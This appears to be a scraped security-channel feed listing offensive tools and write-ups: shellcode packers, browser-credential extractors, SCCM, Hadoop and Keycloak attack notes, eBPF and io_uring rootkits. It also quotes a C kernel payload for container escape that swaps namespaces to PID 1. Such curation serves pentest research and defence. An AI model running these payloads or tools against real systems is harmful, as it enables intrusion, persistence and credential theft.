Nginxpwner - is a simple tool to look for common Nginx misconfigurations and vulnerabilities
Install using Docker
It actually checks for
Install using Docker
git clone https://github.com/stark0de/nginxpwner
cd nginxpwner
sudo docker build -t nginxpwner:latest .
sudo docker run -it nginxpwner:latest /bin/bash
It actually checks for
* Gets Ngnix version and gets its possible exploits using searchsploit and tells if it is outdated
* Throws a wordlist specific to Nginx via gobuster
* Checks if it is vulnerable to CRLF via a common misconfiguration of using $uri in redirects
* Checks for CRLF in all of the paths provided
* Checks if the PURGE HTTP method is available from the outside
* Checks for variable leakage misconfiguration
etc
❤2🐳1
darkPulse
darkPulse is a shellcode packer written in Go that is used to create various shellcode loaders
darkPulse is a shellcode packer written in Go that is used to create various shellcode loaders
❤4🐳1
Netfetch
Scan your Kubernetes clusters to identifiy unprotected workloads and map your existing Network policies
Link
Scan your Kubernetes clusters to identifiy unprotected workloads and map your existing Network policies
* Visualize network policies and pods in a interactive network map
* Scan cluster identify pods without network policies
* Create default deny network policies where this is missing
* Get suggestions for network policies based on existing workloads
Link
❤4🐳1
SCCMHunter
SCCMHunter is a post-ex tool built to streamline identifying, profiling, and attacking SCCM related assets in an Active Directory domain
contains modules such as
Link
SCCMHunter is a post-ex tool built to streamline identifying, profiling, and attacking SCCM related assets in an Active Directory domain
contains modules such as
* admin
* dpapi
* http
* mssql
* smb
Link
GitHub
GitHub - garrettfoster13/sccmhunter: SCCMHunter is a post-ex tool built to streamline identifying, profiling, and attacking SCCM…
SCCMHunter is a post-ex tool built to streamline identifying, profiling, and attacking SCCM related assets in an Active Directory domain. - GitHub - garrettfoster13/sccmhunter: SCCMHunter is a pos...
🤯2❤1
Keycloak pentest
Articles
Part 1 - Link
Part2 - Link
Tools
Keycloak security scanner - Link
* Начиная с keycloak 17.0+ роут /auth в URL должен быть пропущен (
Articles
Part 1 - Link
* Am I Testing Keycloak?
* Keycloak Version Information
* OpenID Configuration /SAML Denoscriptor
* Realms (Enumeration && Self-Registration Enabled)
* Client IDs
* Scopes
* Grants
* Identity Providers
* Roles
* User Email Enumeration
Part2 - Link
Reconnaissance
* Additional Services and Ports
* Interesting Local Files
* Reconnaissance Conclusion
Exploitation
* Brute Force Login
* Bypassing/Automating CSRF
* JWT Signing Algorithms
* Make the most out of your scopes/roles
* offline_access
* uma_authorization
* profile
* address
* phone
Tools
Keycloak security scanner - Link
* Начиная с keycloak 17.0+ роут /auth в URL должен быть пропущен (
/realms/realm_name/)Csacyber
Pentesting Keycloak Part 1: Identifying Misconfiguration Using Risk Management Tools
Keycloak is an open-source Identity and Access Management (IAM) solution. It allows easy implementation of single sign-on for web applications and APIs.
❤5🤯2🐳2
HackBrowserData is a command-line tool for decrypting and exporting browser data
It supports the most popular browsers on the market and runs on Windows, macOS and Linux
Link
* passwords
* history
* cookies
* bookmarks
* download history
* localStorage
* extensions
It supports the most popular browsers on the market and runs on Windows, macOS and Linux
Link
GitHub
GitHub - moonD4rk/HackBrowserData: Extract and decrypt browser data, supporting multiple data types, runnable on various operating…
Extract and decrypt browser data, supporting multiple data types, runnable on various operating systems (macOS, Windows, Linux). - moonD4rk/HackBrowserData
❤3🐳2
Kubernetes security fundamentals
Introduction
API Security
Authentication
Authorization
Admission Control
Networking
Introduction
* Complications of talking about Kubernetes security
* Managed and unmanaged Kubernetes distributions
* Areas of discussion
API Security
* Kubernetes components and ports
- Unmanaged Kubernetes
- Managed Kubernetes
* Securing Kubernetes APIs
Authentication
* Kubernetes authentication principles
- Internal Kubernetes authentication methods
- Static token authentication
- Bootstrap tokens
- X.509 client certificates
- Service account tokens
* External authentication methods
- OpenID Connect (OIDC)
- Webhook token authentication
- Authenticating proxy
- Impersonating proxy
* Authentication for other Kubernetes components
- Kubelet
- Controller manager and scheduler
- Kube-proxy
- Etcd
Authorization
* Kubernetes authorization principles
* Kubernetes authorization modules
- AlwaysAllow and AlwaysDeny
- Node Authorizer
- ABAC
- RBAC
- Webhook
* Authorization for other Kubernetes components
- Kubelet
- Scheduler and Controller Manager
Admission Control
* Admission control overview
- Internal admission controllers
- External admission controllers
* Risks of implementing external admission control
- Using admission control for pod security
Networking
* Network trust zones
* Introduction to CNI
* Managing network access in Kubernetes
* Securing the cluster network
* Conclusion
* Appendix - Setting up a demonstration environment
Datadoghq
Kubernetes security fundamentals: Introduction
Introducing a new series of posts on Kubernetes security fundamentals with a discussion of some of the complexities of Kubernetes security.
❤3🐳3🤯1
Hadoop pentest
Hadoop Attack Library - A collection of pentest tools and resources targeting Hadoop environments
This repository is composed of two kind of information and organised accordingly:
Apache Hadoop Pentesting - Exploits notes with the following sections
Hadoop Attack Library - A collection of pentest tools and resources targeting Hadoop environments
This repository is composed of two kind of information and organised accordingly:
* Tools, Techniques and Procedures to attack an Hadoop environment
* Key vulnerabilities on Hadoop components (Hadoop Common, HDFS, YARN etc.)
* Key vulnerabilities in third-party components often used in Hadoop environments
Apache Hadoop Pentesting - Exploits notes with the following sections
* Authenticate using Keytab
* Impersonate Another Hadoop Service
* HDFS Command Cheat Sheet
* RCE
GitHub
GitHub - wavestone-cdt/hadoop-attack-library: A collection of pentest tools and resources targeting Hadoop environments
A collection of pentest tools and resources targeting Hadoop environments - wavestone-cdt/hadoop-attack-library
❤8🐳1
Nmap-did-what
Nmap-did-what is a Grafana docker container and a Python noscript to parse Nmap XML output to an SQLite database. The SQLite database is used as a datasource within Grafana to view the Nmap scan details in a dashboard.
The project consists of two main components:
Link
Nmap-did-what is a Grafana docker container and a Python noscript to parse Nmap XML output to an SQLite database. The SQLite database is used as a datasource within Grafana to view the Nmap scan details in a dashboard.
The project consists of two main components:
* A Python noscript that parses Nmap XML output and stores the data in an SQLite database.
* A Grafana Docker container with a pre-configured dashboard for visualizing the Nmap scan data.
Link
❤4
Container escape using kernel exploitation & Seccomp bypass via manipulating the container’s namespaces
exploit from article
The above code can be used in any future privilege escalation vulnerability found in the Linux kernel to escape a containerized environment.
Link
exploit from article
void get_root_payload( void) {
((_commit_creds)(COMMIT_CREDS))(
((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)
);
// -------- NAMESPACE DOCKER EXPLOIT --------
// copy nsproxy from init_nsproxy to pid 1 of the container
unsigned long long g = ((_find_task_vpid)(FIND_TASK))(1);
// now, do the magic.... !!!! Simple black magic doesn't work on current process!!!!
((_switch_task_namespaces)(SWITCH_TASK_NS))(( void *)g, (void *)INIT_NSPROXY);
// prepare the two namespace FDs by opening the respective files
long fd = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/mnt", O_RDONLY, 0);
((_sys_setns)(SYS_SETNS))( fd, 0);
fd = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/pid", O_RDONLY, 0);
((_sys_setns)(SYS_SETNS))( fd, 0);
}The above code can be used in any future privilege escalation vulnerability found in the Linux kernel to escape a containerized environment.
Link
Cyberark
The Route to Root: Container Escape Using Kernel Exploitation
Follow an imaginary cyber attacker as she tries to escape a container using kernel exploitation -- with and without root access.
❤4🐳2
IngressNightmare
Уязвимость существует на этапе проверки Admission Controller'ом входящего объекта Ingress, из которого создается конфигурация Nginx и проверяется с помощью
Detect exposed Ingress NGINX Admission Controller - Nuclei Template
Create admission review requests from Ingress resource manifests, which could then be sent directly to the admission controller via HTTP - kube-review
PoC
Full WIZ research - IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX
Уязвимость существует на этапе проверки Admission Controller'ом входящего объекта Ingress, из которого создается конфигурация Nginx и проверяется с помощью
nginx -t, что ведет кCVE-2025-24514 - auth-url Annotation Injection
CVE-2025-1097 - auth-tls-match-cn Annotation Injection
CVE-2025-1098 - mirror UID Injection
CVE-2025-1974 - NGINX Configuration Code Execution
Detect exposed Ingress NGINX Admission Controller - Nuclei Template
Create admission review requests from Ingress resource manifests, which could then be sent directly to the admission controller via HTTP - kube-review
PoC
Full WIZ research - IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX
wiz.io
CVE-2025-1974: The IngressNightmare in Kubernetes | Wiz Blog
Wiz Research uncovered RCE vulnerabilities (CVE-2025-1097, 1098, 24514, 1974) in Ingress NGINX for Kubernetes allowing cluster-wide secret access.
❤4🤯1🐳1
Gitlab CI/CD
Attacking GitLab CI/CD via Shared Runners
Link
Attacking GitLab CI/CD via Shared Runners
* A Standard Poisoned Pipeline
* Shared Docker-in-Docker Runners and Privileged Containers
* The Shared Instance-Level Runner
* Attacking Docker-in-Docker Shared Runners
* Remediation - Hardening the CI/CD Infra
* Shell Executors
Link
Pulse Security
OMGCICD - Attacking GitLab CI/CD via Shared Runners
This article discusses compromising shared CI/CD runner infrastructure, and how an attacker can escalate their privileges from basic source-repository access to compromising the environments the wider system is deploying.
🐳3❤1
eBPF
eBPF: A new frontier for malware
Bad-bpf- A collection of eBPF programs demonstrating bad behavior, presented at DEF CON 29
ebpfkit - rootkit powered by eBPF
With Friends Like eBPF, Who Needs Enemies? - Black hat USA 2021 research
eBPF: A new frontier for malware
* What is eBPF?
* Lifetime of an eBPF program
* kprobes, uprobes, and tracepoints
* eXpress Data Path (XDP)
* Traffic Control (TC)
* Prevention
* Detection
Bad-bpf- A collection of eBPF programs demonstrating bad behavior, presented at DEF CON 29
ebpfkit - rootkit powered by eBPF
With Friends Like eBPF, Who Needs Enemies? - Black hat USA 2021 research
Red Canary
eBPF: A new frontier for malware | Red Canary
Extended Berkeley Packet Filter (eBPF) is beginning to transform the Linux malware landscape. Here's what defenders should look out for.
❤3🐳2
Заинтересовала тема с eBPF, поэтому в качестве эксперимента решил сделать вот такой проект https://github.com/cotsom/eBPF-rootkit/
По сокрытию pid есть хорошие статьи с разбором взятого примера
eBPF program creation in practice – PID concealment (Part 1)
eBPF in practice – PID concealment (Part 2)
* Бекдор через отправку парольной фразы в tcp пакете
* Сокрытие pid'а процесса (этот функционал взят из bad-bpf, но загрузчик переписан на Go)
По сокрытию pid есть хорошие статьи с разбором взятого примера
eBPF program creation in practice – PID concealment (Part 1)
eBPF in practice – PID concealment (Part 2)
GitHub
GitHub - cotsom/eBPF-rootkit: eBPF backdoor with PID hiding
eBPF backdoor with PID hiding. Contribute to cotsom/eBPF-rootkit development by creating an account on GitHub.
❤8🐳4
Post-exploiting a compromised etcd – Full control over the kubernetes cluster and its nodes
* Persistence
* Resources hiding
* Bypassing AdmissionControllers
❤7🐳2
Curing
Curing is a POC of a rootkit that uses io_uring to perform different tasks without using any syscalls
Linux io_uring problems - Link
Curing is a POC of a rootkit that uses io_uring to perform different tasks without using any syscalls
* Read files
* Write files
* Create symbolic links
* C2 server communication
Linux io_uring problems - Link
GitHub
GitHub - armosec/curing: io_uring based rootkit
io_uring based rootkit. Contribute to armosec/curing development by creating an account on GitHub.
❤3🐳2
GRPCUI
command-line tool that lets you interact with gRPC servers via a browser.
If the server has reflection enabled, grpcui will automatically detect the available methods
Usefull for
command-line tool that lets you interact with gRPC servers via a browser.
If the server has reflection enabled, grpcui will automatically detect the available methods
#If u have proto
grpcui -proto service.proto -plaintext grpc-address:50051
#If service have reflection
grpcui -plaintext grpc-address:50051
Usefull for
* Testing via burp
* Using sqlmap & the like
* Supports proxying via proxychains
GitHub
GitHub - fullstorydev/grpcui: An interactive web UI for gRPC, along the lines of postman
An interactive web UI for gRPC, along the lines of postman - fullstorydev/grpcui
❤3🐳3
eBPF rootkit reverse
Link
* Introduction to eBPF
* How are eBPF programs built and loaded?
* Reversing eBPF rootkit
Link
ARMO
Reverse Engineering eBPF Programs: A Deep Dive
Explore how eBPF technology works by reverse engineering eBPF-based programs. Learn about its internals, benefits, and applications in modern computing
🐳4❤1